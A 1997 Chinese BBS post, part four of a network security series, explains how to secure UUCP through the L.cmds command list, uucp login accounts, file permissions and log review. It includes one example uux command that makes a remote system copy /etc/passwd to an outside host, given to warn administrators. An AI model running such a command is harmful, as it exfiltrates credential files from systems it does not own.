发信人: netman.bbs@cs3.xmu.edu.cn (邂逅), 信区: cnhacker
标  题: 网络安全(4)
发信站: cs3 BBS (Mon Jun 16 13:50:33 1997)
转信站: Lilac!ustcnews!ustcnews!sjtunews!cs3
出  处: cs3.xmu.edu.cn

  (2)L.cmds文件
      uuxqt利用/usr/lib/uucp/L.cmds文件确定要执行的远程执行请求命令.
  该文件的格式是每行一条命令.如果只需uuxqt处理电子邮件,该文件中就只须
  一行命令:
      rmail
      系统管理员可允许登录用户执行netnews(rnews)的命令或远程打印命令
  (lp),但决不能允许用户执行拷贝文件到标准输出的命令,如cat命令或网络命
  令uucp,否则这些人只需在他们自己的系统上敲入:
      uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
      然后就可等待本系统发送出命令文件.

  (3)uucp登录
      UUCP系统需要两个登录户头,一个是其它系统登录的户头,另一个是系统
  管理使用的户头.例如,数据传输登录户头是nuucp,管理登录户头是uucp,则在
  /etc/passwd文件中应当有二行.
      UID和GID的5号通常留给uucp,由于uucico具有管理登录的SUID许可,因此
  nuucp户头的UID和GID应当用其它值.

  (4)uucp使用的文件和目录
      /usr/lib/uucp用于存放不能由用户直接运行的各种uucp,如uuxqt和
  uucico.该目录还含有若干个确定uucp如何操作的文件,如L.cmds和USERFILE.
  这些文件只能对uucp管理户头可写(系统管理员一定不愿让用户更改远程可执
  行命令表):根据安全的观点,该目录中另一个系统管理员必须清楚的文件是
  L.sys.该文件中含有uucico能调用的每个系统的入口项.入口项数据包括
  uucico所调用系统的电话号码,登录名,未加密的口令.不用说,L.sys应当属于
  uucp管理户头所有,且应当具有400或600存取许可.
      uucp用/usr/spool/uucp目录存放工作文件.文件名以C.开头的文件是送
  到其它系统的命令文件,含有在其它系统上拷入/出数据和执行命令的请求.文
  件名以D.开头的文件用作C.文件的数据文件.文件名以X.开头的文件是来自其
  它系统的远程执行请求,由uuxqt解释.文件名以TM.开始的文件是从其它系统
  传送数据到本系统过程中uucp所使用的暂存文件.XQTDIR是uuxqt用于执行X.
  文件的目录.LOGFILE可有助于管理uucp的安全,它含有执行uucp请求成功与否
  的信息.系统管理员可时常查看该文件,了解有哪些系统正登录入本系统执行
  uucp请求?是什么请求?特别要检查这些请求是否试图做不允许的操作.

--
※ 来源:·古庙钟声 cs3.xmu.edu.cn·[FROM: freedom@cs3.xmu.edu.]